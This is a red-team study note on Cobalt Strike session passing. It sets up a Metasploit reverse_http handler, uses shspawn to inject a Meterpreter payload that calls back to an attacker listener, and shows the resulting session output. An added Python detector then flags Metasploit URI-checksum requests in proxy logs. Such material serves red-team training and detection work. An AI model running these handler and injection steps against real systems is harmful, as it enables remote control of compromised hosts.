date: 2024-10-07 draft: true
Secondary Categories: 02 - Lateral Movement, 02 - Session Passing
Beacon Passing
Description:
As we know, in Cobalt Strike (and many other C2 frameworks) payloads are tied very closely to listeners. Session passing is the process of spawning a new C2 session from one payload/listener type to another. For example, we could have a long-haul Beacon checking in over DNS, which we can use to spawn a different short-haul Beacon over HTTP. It's also possible to pass sessions between completely different C2 frameworks, such as spawning a Meterpreter session from Beacon.
This is useful for several reasons, including:
- Leverage a capability within another framework that Cobalt Strike doesn't have.
- Use different C2 frameworks as backup access in the event the current access is lost.
- To emulate specific TTPs.
A great example of this is the spawn command in Cobalt Strike.
Foreign Listener
You can also use a Foreign listener in Cobalt Strike, which uses the Metasploit staging protocol.
attacker@ubuntu ~> sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST ens5
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > run
[*] Started HTTP reverse handler on http://10.10.5.50:8080
Go to the listener management in Cobalt Strike and create a new Foreign HTTP listener. The stager host and port must match your MSF multi handler.
NOTICE: The two downsides to using a foreign listener are that it only supports x86 staged payloads, with no x64 or stageless support.
Spawn & Inject
In Cobalt Strike there are two generic commands that can be used for the purpose of session passing:
- shinject: inject into an existing process
- shspawn: spawn a new process and inject into it
beacon> shspawn x64 C:\Payloads\msf_http_x64.bin
[*] http://10.10.5.50:8080 handling request from 10.10.122.254; (UUID: 64tqy4zf) Redirecting stageless connection from /jeqN5SIPwEzAGcEbowwz7Q-hb8QsIP with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36'
[*] http://10.10.5.50:8080 handling request from 10.10.122.254; (UUID: 64tqy4zf) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (10.10.5.50:8080 -> 127.0.0.1) at 2022-09-05 13:04:53 +0000
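The handler output above shows the resource path the stageless payload requested; Metasploit's reverse_http handler decides what to do with a request from an 8-bit checksum of that path. The following detector is an added example, not part of the original note: the mode values are those in Metasploit's Rex::Payloads::Meterpreter::UriChecksum, while the proxy log lines, URIs and the log format are constructed for the example.

```python
import re

# Mode values from Metasploit's Rex::Payloads::Meterpreter::UriChecksum (8-bit sum of the URI).
URI_MODES = {
    92: "INITW/INITN",  # staged native (Windows) stager requesting its stage
    80: "INITP",        # staged Python stager
    88: "INITJ",        # staged Java stager
    95: "INIT_CONN",    # stageless payload's first request; the handler answers with a redirect
    98: "CONN",         # session checking back in on its redirected URI
}
URI_CHECKSUM_MIN_LEN = 5
_NOT_BASE64URL = re.compile(r"[^A-Za-z0-9_\-]")
# Constructed log layout: timestamp client method url status
_LOG_RE = re.compile(r"^\S+ (\S+) \S+ https?://([^/\s]+)(/\S*)? ")

def checksum8(data: str) -> int:
    """Sum of the byte values modulo 256, as Rex::Text.checksum8 computes it."""
    return sum(data.encode("ascii", "ignore")) % 0x100

def classify_uri(path: str):
    """Mode the handler would assign to the first path segment, or None if it matches nothing."""
    # Mirror the handler: drop the query string, keep only base64url characters,
    # enforce the minimum length, then look the 8-bit checksum up in the mode table.
    segment = path.split("?", 1)[0].strip("/").split("/", 1)[0]
    bare = _NOT_BASE64URL.sub("", segment)
    if len(bare) < URI_CHECKSUM_MIN_LEN:
        return None
    return URI_MODES.get(checksum8(bare))

# Constructed proxy log lines (not taken from the page); the first three paths were built
# so that their checksums hit 92, 95 and 98, the last two are ordinary browsing.
SAMPLE_LOG = """\
2022-09-05T13:04:50Z 10.10.122.254 GET http://10.10.5.50:8080/x7Lq2VbN90O 200
2022-09-05T13:04:51Z 10.10.122.254 GET http://10.10.5.50:8080/p9Zw_Km4JP 200
2022-09-05T13:04:52Z 10.10.122.254 GET http://10.10.5.50:8080/Rt6vQ_aze/ 200
2022-09-05T13:05:00Z 10.10.122.17 GET http://intranet.example/index.html 200
2022-09-05T13:05:01Z 10.10.122.17 GET http://intranet.example/static/app.js 200
"""

def scan_log(text: str) -> list:
    """Return (client, host, path, mode) for every request whose path matches a mode."""
    hits = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        path = m.group(3) or "/"
        mode = classify_uri(path)
        if mode:
            hits.append((m.group(1), m.group(2), path, mode))
    return hits
```

An 8-bit checksum collides with roughly 1 in 256 arbitrary paths, so treat a hit as a hunting lead to pair with the User-Agent and destination seen in the log rather than as a blocking rule.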
Created Date: November 17th 2022 23:34
Last Modified Date: November 17th 2022 23:34